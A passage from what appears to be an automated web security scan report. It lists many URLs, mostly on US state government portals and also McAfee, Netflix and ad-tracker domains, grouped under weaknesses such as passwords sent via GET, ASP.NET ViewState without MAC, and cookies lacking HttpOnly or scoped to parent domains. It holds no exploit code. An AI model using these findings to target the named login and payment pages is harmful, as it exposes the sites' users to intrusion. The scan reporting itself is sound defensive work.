7.146. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabLeft.gif
7.147. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabRight.gif
7.148. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-button.gif
7.149. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-lock.gif
7.150. https://www.nrsservicecenter.com/content/media/retail/js/wtlOhio.js
7.151. https://www.nrsservicecenter.com/favicon.ico
7.152. https://www.ri.gov/Licensing/renewal/license.php
7.153. https://www.scsignon.sc.gov/Common/HelpWindow.aspx
7.154. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotPassword.aspx
7.155. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotUserName.aspx
7.156. https://www.scsignon.sc.gov/Login.aspx
7.157. https://www.scsignon.sc.gov/SCBOS.Core.DynamicFormsGlobal.Resources.aspx
7.158. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Imaging.Resources.aspx
7.159. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.Controls.Resources.aspx
7.160. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.UI.Resources.aspx
7.161. https://www.scsignon.sc.gov/WebResource.axd
7.162. https://www.scsignon.sc.gov/eng/Secured/Security/CreateUserName.aspx
8.1. http://apps.tn.gov/bizreg/tax.jsp
8.2. https://apps.tn.gov/bizreg/tax.jsp
8.3. https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp
8.4. https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp
8.5. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp
8.6. http://az.gov/app/calendar/CalendarRemoteDisplay.xhtml
8.8. http://bh.contextweb.com/bh/set.aspx
8.10. http://de.gov/profile.php
8.11. http://ga.gov/00/home/0,2061,4802,00.html
8.12. http://ga.gov/00/home/0,2061,4802,00.html
8.13. http://kodakimagingnetworki.tt.omtrdc.net/m2/kodakimagingnetworki/mbox/standard
8.14. http://l.sharethis.com/pview
8.15. https://louisianadcpretire.gwrs.com/login.do
8.16. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
8.17. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo
8.18. http://mt0.googleapis.com/mapslt/ft
8.19. https://myalaska.state.ak.us/home/app
8.20. http://server.iad.liveperson.net/hc/33511087/
8.21. https://services.georgia.gov/dhr/cspp/do/public/Welcome
8.23. http://www.ehawaii.gov/dakine/index.html
8.24. http://www.goccp.maryland.gov/lists/index.php
8.25. http://www.in.gov/dhs/3163.htm
8.26. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp
8.27. http://www.legis.state.pa.us/cfdocs/legis/PN/Public/btCheck.cfm
8.28. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal
8.29. http://www.utah.gov/transparency/index.html
9.1. https://nhlicenses2.nh.gov/
9.2. https://mibid.bidcorp.com/
9.3. https://nhlicenses.nh.gov/
9.4. https://treas-secure.treas.state.mi.us/
9.5. https://www.alabamainteractive.org/
9.6. https://www.compasssmartshopper.com/
9.7. https://www.nrsservicecenter.com/
10. Password field submitted using GET method
10.2. http://www.alabama.gov/portal/index.jsp
11. ASP.NET ViewState without MAC enabled
11.1. https://fortress.wa.gov/dol/dolprod/dsdoffices/
11.2. https://home.mcafee.com/secure/cart
11.3. https://home.mcafee.com/secure/cart/
11.4. https://home.mcafee.com/secure/purchase/
11.5. http://sd.gov/headlines/headlines_home/headlines.aspx
11.6. http://www.vitalchek.com/louisiana-express-vital-records.aspx
13. Cookie scoped to parent domain
13.1. http://api.twitter.com/1/statuses/user_timeline/okgov.json
13.2. https://fin.oaks.ohio.gov/psp/FNPRD/
13.3. https://hcm.oaks.ohio.gov/psp/HCPRD/
13.5. http://home.mcafee.com/AdviceCenter/Default.aspx
13.6. http://home.mcafee.com/Default.aspx
13.7. http://home.mcafee.com/Root/AboutUs.aspx
13.8. http://home.mcafee.com/Root/Support.aspx
13.9. http://home.mcafee.com/SiteMap.aspx
13.10. http://home.mcafee.com/Store/
13.11. http://home.mcafee.com/Store/Downloads.aspx
13.12. http://home.mcafee.com/VirusInfo/
13.13. http://home.mcafee.com/root/MyAccount.aspx
13.14. http://home.mcafee.com/root/dynamicpage.aspx
13.15. http://home.mcafee.com/store/default.aspx
13.16. http://home.mcafee.com/supportpages/privacyFeedback.aspx
13.17. http://home.mcafee.com/supportpages/purchasehelp.aspx
13.18. https://home.mcafee.com/ScriptResource.axd
13.19. https://home.mcafee.com/Secure/Protected/Login.aspx
13.20. https://home.mcafee.com/WebResource.axd
13.21. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js
13.22. https://home.mcafee.com/secure/cart
13.23. https://home.mcafee.com/secure/cart/
13.24. https://home.mcafee.com/secure/purchase/
13.25. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/
13.26. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/
13.27. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login
13.28. http://us.mcafee.com/root/basket.asp
13.29. http://www.coloradochannel.net/
13.30. http://www.exploreohio.org/node/11452
13.31. http://www.georgiawildlife.com/
13.32. http://www.georgiawildlife.com/boating/registration
13.33. http://www.georgiawildlife.com/node/1873
13.34. http://www.illinois.gov/PressReleases/PressReleasesSearch.cfm
13.35. http://www.illinois.gov/PressReleases/ShowPressRelease.cfm
13.36. http://www.illinois.gov/PressReleases/ShowbyM.cfm
13.37. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp
13.38. http://www.netflix.com/
13.39. http://www.netflix.com/NRD/PS3
13.40. http://www.netflix.com/NRD/Wii
13.41. http://www.netflix.com/NRD/Xbox
13.42. http://www.opensource.org/licenses/mit-license.php
13.43. http://www.tanfa.co.uk/archives/show.asp
13.45. http://a.triggit.com/px
13.46. http://ads.adbrite.com/adserver/vdi/711384
13.47. https://adwords.google.com/select/Login
13.48. https://adwords.google.com/um/StartNewLogin
13.49. http://b.scorecardresearch.com/b
13.50. http://bh.contextweb.com/bh/rtset
13.51. http://bh.contextweb.com/bh/set.aspx
13.52. http://blogsearch.google.com/
13.53. http://books.google.com/bkshp
13.54. http://books.google.com/books
13.55. http://bs.serving-sys.com/BurstingPipe/adServer.bs
13.56. http://del.icio.us/post
13.57. https://favorites.live.com/quickadd.aspx
13.58. http://finance.yahoo.com/q
13.59. http://groups.google.com/grphp
13.61. http://ib.adnxs.com/seg
13.62. http://id.google.com/verify/EAAAAJR-W9n_BEIB_zbNgVGlkRI.gif
13.63. http://id.google.com/verify/EAAAAJjd7InK0_AwgsQIx0lPt28.gif
13.64. http://id.google.com/verify/EAAAAMOrTls6merGAfxdZppvi6I.gif
13.65. http://id.google.com/verify/EAAAAP-cj6E6L5hPaay4uczj5Ho.gif
13.66. http://idcs.interclick.com/Segment.aspx
13.67. http://image.providesupport.com/js/hic/safe-standard.js
13.68. http://image.providesupport.com/js/hic/safe-textlink.js
13.69. http://image2.pubmatic.com/AdServer/Pug
13.70. http://kdkgllry.netmng.com/
13.71. http://khmdb0.google.com/kh
13.72. http://khmdb1.google.com/kh
13.73. https://maps-api-ssl.google.com/maps
13.74. http://metrics.kodakgallery.com/b/ss/kinkodakgallerycomprod/1/H.22.1/s78523519213777
13.75. http://newbrowse.livehelper.com/servlet/lhBrowse
13.76. http://picasaweb.google.com/home
13.77. http://picasaweb.google.com/lh/view
13.78. http://pipes.yahoo.com/pipes/pipe.run
13.79. https://pixel.fetchback.com/serve/fb/pdc
13.80. http://pixel.mathtag.com/event/img
13.81. http://pixel.quantserve.com/pixel
13.82. http://pixel.rubiconproject.com/tap.php
13.83. http://scholar.google.com/schhp
13.84. http://server.iad.liveperson.net/hc/33511087/
13.85. http://shots.snap.com/snap_shots.js
13.86. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s21968461417127
13.87. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22063515547197
13.88. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22238083938136
13.89. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s25464643554296
13.90. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27148967052344
13.91. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s2762329166755
13.92. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27866187379695
13.93. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s29011461706832
13.94. http://video.google.com/
13.95. http://www.access-board.gov/sec508/guide/1194.22.htm
13.96. http://www.facebook.com/TeamHaslam
13.97. http://www.facebook.com/WSDOL
13.98. http://www.facebook.com/campaign/landing.php
13.99. http://www.facebook.com/note.php
13.100. http://www.facebook.com/ohiodivisionofwatercraft
13.101. http://www.facebook.com/pages/Austin-TX/Texasgov/117263931626845
13.104. http://www.facebook.com/photo.php
13.105. http://www.facebook.com/share.php
13.106. http://www.facebook.com/video/video.php
13.107. http://www.flickr.com/groups_join.gne
13.108. https://www.humanservices.state.pa.us/idm/managedidmpub/ca12/index.jsp
13.109. http://www.linkedin.com/companies/166141
13.110. http://www.molottery.com/winningNumbers.do
13.111. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/Ohio457-site.css
13.112. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/base-style.css
13.113. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/print.css
13.115. https://www.nrsservicecenter.com/content/media/retail/images/Logos/Ohio457.gif
13.116. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg
13.119. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabLeft.gif
13.120. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabRight.gif
13.122. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-lock.gif
13.123. https://www.nrsservicecenter.com/content/media/retail/js/wtlOhio.js
13.124. https://www.nrsservicecenter.com/favicon.ico
13.125. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin
13.126. https://www.nrsservicecenter.com/iApp/ret/content/landing.do
13.127. https://www.nrsservicecenter.com/iApp/ret/landing.do
13.128. https://www.nrsservicecenter.com/iApp/ret/showPage.do
13.129. http://www.real.com/realplayer
13.130. http://www.reserveamerica.com/la/state/campgrounds/r/campgroundDirectoryList.do
14. Cookie without HttpOnly flag set
14.1. https://apps.tn.gov/bizreg/bizregprog
14.2. https://apps.tn.gov/bizreg/tax.jsp
14.3. https://apps.tn.gov/biztax-app/login.html
14.4. https://apps.tn.gov/paams-app/index.htm
14.5. https://apps.tn.gov/paams-app/recover/resetpassword.htm
14.6. https://apps.tn.gov/paams-app/recover/retrieveusermane.htm
14.7. https://assist.dhss.delaware.gov/PGM/ASP/SAACC.asp
14.8. https://assist.dhss.delaware.gov/PGM/ASP/SACOM.asp
14.9. https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
14.10. https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp
14.11. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp
14.12. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp
14.13. https://assist.dhss.delaware.gov/PGM/ASP/SC024.asp
14.14. https://assist.dhss.delaware.gov/PGM/ASP/SC031.asp
14.15. http://az.gov/app/calendar/CalendarRemoteDisplay.xhtml
14.16. http://badge.dopiaza.org/flickr/badge.php
14.18. http://cityofmuscleshoals.com/Default.asp
14.19. http://crd.dnr.state.ga.us/content/displaynavigation.asp
14.20. https://dhr.ky.gov/DHRWeb/RS
14.21. http://dnr.maryland.gov/service/
14.22. https://dotax.ehawaii.gov/efile/user
14.23. https://edmv-sp.dot.state.nc.us/sp/NoticeServlet
14.24. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp
14.25. http://elicense4-lookup.com.ohio.gov/SearchCriteria.asp
14.26. http://factfinder.census.gov/servlet/EconSectorServlet
14.27. https://fin.oaks.ohio.gov/psp/FNPRD/
14.28. https://fortress.wa.gov/dol/dolprod/dsdoffices/
14.30. http://ga.gov/gta/GTASearch
14.32. http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp
14.33. http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp
14.34. https://georgiawildlife.dnr.state.ga.us/service/login1.asp
14.35. https://hcm.oaks.ohio.gov/psp/HCPRD/
14.36. http://home.mcafee.com/
14.37. http://home.mcafee.com/AdviceCenter/Default.aspx
14.38. http://home.mcafee.com/Default.aspx
14.39. http://home.mcafee.com/Root/AboutUs.aspx
14.40. http://home.mcafee.com/Root/Support.aspx
14.41. http://home.mcafee.com/SiteMap.aspx
14.42. http://home.mcafee.com/Store/
14.43. http://home.mcafee.com/Store/Downloads.aspx
14.44. http://home.mcafee.com/VirusInfo/
14.45. http://home.mcafee.com/root/MyAccount.aspx
14.46. http://home.mcafee.com/root/dynamicpage.aspx
14.47. http://home.mcafee.com/store/default.aspx
14.48. http://home.mcafee.com/supportpages/privacyFeedback.aspx
14.49. http://home.mcafee.com/supportpages/purchasehelp.aspx
14.50. https://home.mcafee.com/ScriptResource.axd
14.51. https://home.mcafee.com/Secure/Protected/Login.aspx
14.52. https://home.mcafee.com/WebResource.axd
14.53. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js
14.54. https://home.mcafee.com/secure/cart
14.55. https://home.mcafee.com/secure/cart/
14.56. https://home.mcafee.com/secure/purchase/
14.57. http://hpd.dnr.state.ga.us/content/displaycontent.asp
14.59. http://ilsapp.lib.de.us/uhtbin/cgisirsi/x/x/0/5
14.60. https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm
14.61. http://le.utah.gov/asp/lfa/lfareports.asp
14.62. http://legis.state.la.us/main.asp
14.63. http://legis.state.la.us/main.asp
14.64. http://legis.state.la.us/main.asp
14.65. https://license.ohio.gov/lookup/default.asp
14.66. https://louisianadcpretire.gwrs.com/login.do
14.67. http://maillist2.nh.gov/lists/
14.69. https://moversguide.usps.com/icoa/flow.do
14.70. https://myalaska.state.ak.us/home/app
14.71. http://nc.gov/favicon.ico
14.72. http://ncchildcaresearch.dhhs.state.nc.us/search.asp
14.74. http://nd.gov/category.htm
14.75. http://nd.gov/content.htm
14.76. http://nd.gov/postcard.htm
14.77. https://nhlicenses.nh.gov/MyLicense%20Verification/Search.aspx
14.78. https://njmvcscheduling.state.nj.us/tc/driverlogin.do
14.79. http://nvsos.gov/index.aspx
14.80. https://onestop.michigan.gov/OneStop/a
14.81. https://onestop.michigan.gov/OneStop/ssoNeedPassword.do
14.82. https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do
14.83. http://pa.gov/portal/server.pt
14.86. http://path.trackinglabs.com/c.php
14.87. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/
14.88. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/
14.89. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login
14.90. http://puco.ohio.gov/Puco/Utilities/OneStop.cfm
14.91. http://puco.ohio.gov/puco/forms/form.cfm
14.92. http://regulatorystaff.sc.gov/orsContent.asp
14.93. https://secure.apps.state.nd.us/dot/mv/mvrenewal/renewal.htm
14.94. https://secure.sces.org/PDIC/GatewayServlet
14.95. https://secure.utah.gov/rex/
14.96. https://secure.utah.gov/rex/index.html
14.97. https://services.georgia.gov/dhr/cspp/do/public/Welcome
14.98. http://smu.governor.delaware.gov/cgi-bin/mail.php
14.99. http://smu.portal.delaware.gov/cgi-bin/mail.php
14.100. http://sussex.de.schoolwebpages.com/education/school/school.php
14.101. https://unitedalert.com/
14.102. http://us.mcafee.com/root/basket.asp
14.103. http://us.mcafee.com/root/basket.asp
14.104. http://us.mcafee.com/root/basket.asp
14.105. http://us.mcafee.com/root/basket.asp
14.106. http://va.gov/ext_redirect.asp
14.107. http://va.gov/ext_redirect.asp
14.108. https://web.globalpay.com/taxpayer/default.asp
14.109. http://webapps6.doc.state.nc.us/opi/offenderescapesearch.do
14.110. http://webapps6.doc.state.nc.us/opi/offenderreleasesearch.do
14.111. http://www.511ia.org/default.asp
14.112. https://www.accesskansas.org/bess/flow/main
14.113. https://www.accesskansas.org/businesscenter/index.html
14.114. https://www.accesskansas.org/dissolutions/
14.115. http://www.adfg.alaska.gov/index.cfm
14.116. http://www.agriculture.state.tn.us/Marketing.asp
14.117. http://www.alabama.gov/portal/index.jsp
14.118. https://www.alabamainteractive.org/abc_license/
14.120. http://www.buzgate.org/8.0/ny/fh.html
14.121. http://www.capehenlopenschools.com/education/district/district.php
14.122. http://www.carson-city.nv.us/Index.aspx
14.123. http://www.colorado.gov/
14.124. http://www.colorado.gov/cs/Satellite
14.125. http://www.coloradochannel.net/
14.126. http://www.conwaygreene.com/nmonesource/publicLicense.aspx
14.127. http://www.cotrip.org/device.htm
14.128. http://www.dds.ga.gov/drivers/DLdata.aspx
14.129. http://www.deldot.gov/public.ejs
14.130. http://www.delmar.k12.de.us/education/district/district.php
14.131. http://www.dhh.louisiana.gov/links.asp
14.132. http://www.dhh.louisiana.gov/offices/
14.133. http://www.dhh.louisiana.gov/offices/email-page.asp
14.134. http://www.dhh.louisiana.gov/offices/faq.asp
14.135. http://www.dhh.louisiana.gov/offices/inquiryform.asp
14.136. http://www.dhh.louisiana.gov/offices/links.asp
14.137. http://www.dhh.louisiana.gov/offices/locations.asp
14.138. http://www.dhh.louisiana.gov/offices/page.asp
14.139. http://www.dhh.louisiana.gov/offices/page.asp
14.140. http://www.dhh.louisiana.gov/offices/publications.asp
14.141. http://www.dhh.louisiana.gov/offices/reports.asp
14.142. http://www.dhh.louisiana.gov/page.asp
14.143. http://www.dms.myflorida.com/mfmp
14.144. http://www.dsf.health.state.pa.us/health/cwp/view.asp
14.145. http://www.energyguide.com/EnergySmartSBE/welcomeba.asp
14.146. http://www.exploreohio.org/node/11452
14.147. http://www.flsenate.gov/Legislators/index.cfm
14.148. http://www.georgia.gov/external/
14.149. http://www.georgia.gov/gta/translate/0,2678,4802,00.html
14.150. http://www.georgiawildlife.com/
14.151. http://www.georgiawildlife.com/boating/registration
14.152. http://www.georgiawildlife.com/node/1873
14.153. http://www.goccp.maryland.gov/lists/index.php
14.154. http://www.governor.state.pa.us/portal/server.pt
14.155. http://www.governor.wa.gov/news/news-view.asp
14.156. http://www.healthynh.com/index-fhc.php
14.157. http://www.heretohelp.pa.gov/portal/server.pt
14.158. http://www.hoosierdata.in.gov/nav.asp
14.159. https://www.humanservices.state.pa.us/idm/managedidmpub/ca12/index.jsp
14.160. http://www.illinois.gov/PressReleases/PressReleasesSearch.cfm
14.161. http://www.illinois.gov/PressReleases/ShowPressRelease.cfm
14.162. http://www.illinois.gov/PressReleases/ShowbyM.cfm
14.163. http://www.in.gov/sliverheader/Welcome.do
14.164. http://www.instacam.com/search.asp
14.165. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp
14.166. http://www.legis.louisiana.gov/boards/board_members.asp
14.167. http://www.legis.state.la.us/billdata/bytype.asp
14.168. http://www.linkedin.com/companies/166141
14.169. http://www.mema.state.md.us/MEMA/content_page.jsp
14.170. http://www.molottery.com/winningNumbers.do
14.171. http://www.money-rates.com/news/10-best-states-for-making-a-living.htm
14.173. http://www.ms.gov/how_do_i_answer_page.jsp
14.174. http://www.ms.gov/how_do_i_fulllist.jsp
14.175. http://www.ms.gov/how_do_i_sub_answer_page.jsp
14.176. http://www.ms.gov/ms_sub_sub_template.jsp
14.177. http://www.ms.gov/ms_sub_template.jsp
14.178. http://www.ms.gov/online_services_sub_sub_all.jsp
14.179. http://www.ms.gov/state_agencies_alpha.jsp
14.180. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal
14.181. http://www.nccourts.org/Citizens/GoToCourt/Default.asp
14.182. http://www.nccrimecontrol.org/Index2.cfm
14.183. http://www.nd.gov/content.htm
14.184. http://www.netflix.com/
14.185. http://www.netflix.com/NRD/PS3
14.186. http://www.netflix.com/NRD/Wii
14.187. http://www.netflix.com/NRD/Xbox
14.188. http://www.nist.gov/search-results.cfm
14.189. http://www.nmshtd.state.nm.us/main.asp
14.190. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin
14.191. https://www.nrsservicecenter.com/iApp/ret/content/landing.do
14.192. https://www.nrsservicecenter.com/iApp/ret/landing.do
14.193. https://www.nrsservicecenter.com/iApp/ret/showPage.do
14.194. http://www.ok.gov/genthree/get_resized_image.php
14.195. http://www.ok.gov/genthree/rt_get_resized_image.php
14.196. http://www.opensource.org/licenses/mit-license.php
14.197. http://www.p2pays.org/ref/07/06568/2001/nframe.asp
14.198. http://www.pa.gov/portal/server.pt
14.199. http://www.portal.state.pa.us/portal/server.pt/document/1036792/corbettwebphoto_jpg
14.200. http://www.psp.state.pa.us/portal/server.pt
14.201. http://www.qualityinfo.org/olmisj/OlmisZine
14.202. http://www.real.com/realplayer
14.203. http://www.reserveamerica.com/la/state/campgrounds/r/campgroundDirectoryList.do
14.204. http://www.scdmvonline.com/DMVNew/default.aspx
14.205. http://www.sled.state.sc.us/sled/default.asp
14.206. http://www.sus.edu/CatSubCat/CatSubCat.asp
14.207. http://www.tanfa.co.uk/archives/show.asp
14.208. https://www.tennesseeanytime.org/paams-app/index.htm
14.209. http://www.texasonline.state.tx.us/app/orig/index.jsp
14.210. http://www.theoutdoorshop.state.pa.us/FBG/game/GameLicenseSelect.asp
14.211. http://www.txdmv.gov/vehicles/registration/register.htm
14.212. http://www.utah.gov/locationaware/getMeetings.html
14.213. http://www.utah.gov/pmn/sitemap/notice/67945.html
14.214. http://www.utah.gov/services/
14.215. http://www.utah.gov/services/business.html
14.216. http://www.utah.gov/services/financial.html
14.217. http://www.utah.gov/services/index.html
14.218. http://www.utah.gov/transparency/entity_profile.html
14.219. http://www.utah.gov/transparency/index.html
14.220. http://www.utah.gov/whatsnew/rss.xml
14.221. http://www.va.gov/ext_redirect.asp
14.222. https://www.vermontjoblink.com/ada/
14.223. https://www.vermontjoblink.com/ada/404/404_qry.cfm
14.224. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm
14.225. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm
14.226. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico
14.227. https://www.vermontjoblink.com/ada/default.cfm
14.228. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm
14.229. https://www.vermontjoblink.com/ada/leavesite.cfm
14.230. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm
14.231. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
14.232. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm
14.233. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm
14.234. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm
14.235. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm
14.236. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm
14.237. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm
14.238. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm
14.239. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm
14.240. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm
14.241. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm
14.242. https://www.vermontjoblink.com/ada/works/FAQ.cfm
14.243. https://www.vermontjoblink.com/ada/works/Login.cfm
14.244. https://www.vermontjoblink.com/ada/works/contactus.cfm
14.245. https://www.vermontjoblink.com/ada/works/employeroverview.cfm
14.246. https://www.vermontjoblink.com/ada/works/joboverview.cfm
14.247. https://www.vermontjoblink.com/ada/works/jobsearch.cfm
14.248. https://www.vermontjoblink.com/ada/works/linkview.cfm
14.249. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm
14.250. https://www.vermontjoblink.com/favicon.ico
14.251. http://www.visitflorida.com/floridalive
14.253. http://www.webtools.ca.gov/javascript/shared/weather2/weather3.js.asp
14.254. http://a.triggit.com/px
14.255. http://ad.yieldmanager.com/pixel
14.256. http://ad.yieldmanager.com/unpixel
14.257. http://ads.adbrite.com/adserver/vdi/711384
14.258. https://adwords.google.com/um/StartNewLogin
14.260. http://api.twitter.com/1/statuses/user_timeline/okgov.json
14.261. https://ask.census.gov/cgi-bin/askcensus.cfg/php/enduser/std_adp.php
14.262. https://assist.dhss.delaware.gov/INCLUDES/INJSC.JS
14.263. https://assist.dhss.delaware.gov/PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf
14.264. https://assist.dhss.delaware.gov/Style/ASSIST_SC_StyleNET.css
14.265. https://assist.dhss.delaware.gov/Style/Assist_Style_NET.css
14.266. https://assist.dhss.delaware.gov/favicon.ico
14.267. https://assist.dhss.delaware.gov/images/Assist_header_people.jpg
14.268. https://assist.dhss.delaware.gov/images/Assist_header_text.gif
14.269. https://assist.dhss.delaware.gov/images/Assist_logo.gif
14.270. https://assist.dhss.delaware.gov/images/arrow_center.gif
14.271. https://assist.dhss.delaware.gov/images/arrow_left.gif
14.272. https://assist.dhss.delaware.gov/images/arrow_right.gif
14.273. https://assist.dhss.delaware.gov/images/corner_brown_color.gif
14.274. https://assist.dhss.delaware.gov/images/corner_teal_color.gif
14.275. https://assist.dhss.delaware.gov/images/gold_rule_shim.gif
14.276. https://assist.dhss.delaware.gov/images/shim.gif
14.277. http://b.scorecardresearch.com/b
14.278. http://bh.contextweb.com/bh/rtset
14.279. http://bh.contextweb.com/bh/set.aspx
14.280. http://blogsearch.google.com/
14.281. http://books.google.com/bkshp
14.282. http://books.google.com/books
14.283. http://bs.serving-sys.com/BurstingPipe/adServer.bs
14.285. http://del.icio.us/post
14.286. http://delicious.com/post
14.287. http://digg.com/submit
14.288. https://favorites.live.com/quickadd.aspx
14.289. http://finance.yahoo.com/q
14.290. https://fortress.wa.gov/dol/dolprod/vehoffices/
14.291. http://groups.google.com/grphp
14.294. http://ia.gov/weather_conditions/9430739
14.295. http://idaho.gov/public/portal/contact.html
14.296. http://idcs.interclick.com/Segment.aspx
14.297. http://image.providesupport.com/js/hic/safe-standard.js
14.298. http://image.providesupport.com/js/hic/safe-textlink.js
14.299. http://image2.pubmatic.com/AdServer/Pug
14.301. http://in.gov/apps/ii/oss/agencyInfo/listing
14.302. http://in.gov/apps/ii/oss/agencyInfo/selection
14.303. http://in.gov/apps/ii/oss/categoryInfo/listing
14.304. http://in.gov/apps/ii/oss/categoryInfo/selection
14.305. http://in.gov/apps/ii/oss/js/application.js
14.306. http://in.gov/apps/ii/oss/js/filterlist.js
14.307. http://in.gov/apps/ii/oss/mostPopularInfo/selection
14.308. http://in.gov/apps/ii/oss/search/term
14.309. http://in.gov/core/agriculture.html
14.310. http://in.gov/core/business.html
14.311. http://in.gov/core/css/global.css
14.312. http://in.gov/core/css/global2.css
14.313. http://in.gov/core/images/advanced_search-bg.gif
14.314. http://in.gov/core/images/amber_alert.gif
14.315. http://in.gov/core/images/atg.gif
14.316. http://in.gov/core/images/bgs.gif
14.317. http://in.gov/core/images/billboards/INGOV_severe_weather.jpg
14.318. http://in.gov/core/images/billboards/INgov_DNRapp_bb.jpg
14.319. http://in.gov/core/images/billboards/SOS__billboard.jpg
14.320. http://in.gov/core/images/billboards/ingov_inshapebb.jpg
14.321. http://in.gov/core/images/billboards/ingov_tindleybb.jpg
14.322. http://in.gov/core/images/blue_pixel.gif
14.323. http://in.gov/core/images/calendar_icon.gif
14.324. http://in.gov/core/images/elected_officials-icon2.gif
14.325. http://in.gov/core/images/faq_icon-over.gif
14.326. http://in.gov/core/images/faq_icon.gif
14.327. http://in.gov/core/images/footer-wide.gif
14.328. http://in.gov/core/images/footer.gif
14.329. http://in.gov/core/images/go.gif
14.330. http://in.gov/core/images/governor_daniels.gif
14.331. http://in.gov/core/images/highlights_bg_horiz.gif
14.332. http://in.gov/core/images/highlights_bg_vert.gif
14.333. http://in.gov/core/images/highlights_bottom.gif
14.334. http://in.gov/core/images/highlights_left.gif
14.335. http://in.gov/core/images/highlights_right.gif
14.336. http://in.gov/core/images/icon_email.gif
14.337. http://in.gov/core/images/icon_findperson.gif
14.338. http://in.gov/core/images/icon_help.gif
14.339. http://in.gov/core/images/icon_link.gif
14.340. http://in.gov/core/images/icon_mobile.gif
14.341. http://in.gov/core/images/icon_ratepage.gif
14.342. http://in.gov/core/images/icon_rss.gif
14.343. http://in.gov/core/images/icon_subscribe.gif
14.344. http://in.gov/core/images/icon_twitter.gif
14.345. http://in.gov/core/images/icon_youtube.gif
14.346. http://in.gov/core/images/indiana_map.gif
14.347. http://in.gov/core/images/ingov_logo.gif
14.348. http://in.gov/core/images/lgov.gif
14.349. http://in.gov/core/images/link_divider.gif
14.350. http://in.gov/core/images/main_bg-wide.gif
14.351. http://in.gov/core/images/main_bg.gif
14.352. http://in.gov/core/images/next.gif
14.353. http://in.gov/core/images/next.png
14.354. http://in.gov/core/images/online_services_icon-over.gif
14.355. http://in.gov/core/images/online_services_icon.gif
14.356. http://in.gov/core/images/page_bg.jpg
14.357. http://in.gov/core/images/prev.gif
14.358. http://in.gov/core/images/prev.png
14.359. http://in.gov/core/images/search_button-new2.gif
14.360. http://in.gov/core/images/search_button.gif
14.361. http://in.gov/core/images/searchfield_bg-new2.gif
14.362. http://in.gov/core/images/sos.gif
14.363. http://in.gov/core/images/subscribe_button.gif
14.364. http://in.gov/core/images/tab_bg.gif
14.365. http://in.gov/core/images/tab_left.gif
